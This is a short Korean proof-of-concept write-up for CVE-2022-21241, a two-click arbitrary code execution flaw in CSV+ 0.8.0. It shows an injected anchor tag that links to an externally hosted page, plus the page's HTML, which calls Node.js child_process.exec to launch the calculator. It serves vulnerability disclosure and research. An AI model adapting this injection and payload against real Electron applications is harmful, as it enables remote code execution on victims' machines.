
👻 [PoC] CSV+ 0.8.0 - 임의 코드 실행 (CVE-2022-21241)
👻 2-클릭 임의 코드 실행 취약점.

CVE-2022-21241
⚠
이 PoC는 사용자에게 경고하고 자신의 CSV+에서 취약점을 조사하기 위해 만들어졌으며, 공격에 사용되는 것을 금지합니다.
다음 버전이 취약합니다.
공격자는 Node.js 기능을 사용하여 임의 코드를 실행할 수 있습니다. 그들은 악성 js 코드를 어떤 사이트에 배치하고 CSV+의 HTML 주입 취약점을 통해 a-태그에서 링크할 것입니다.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html는 임시 링크입니다.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>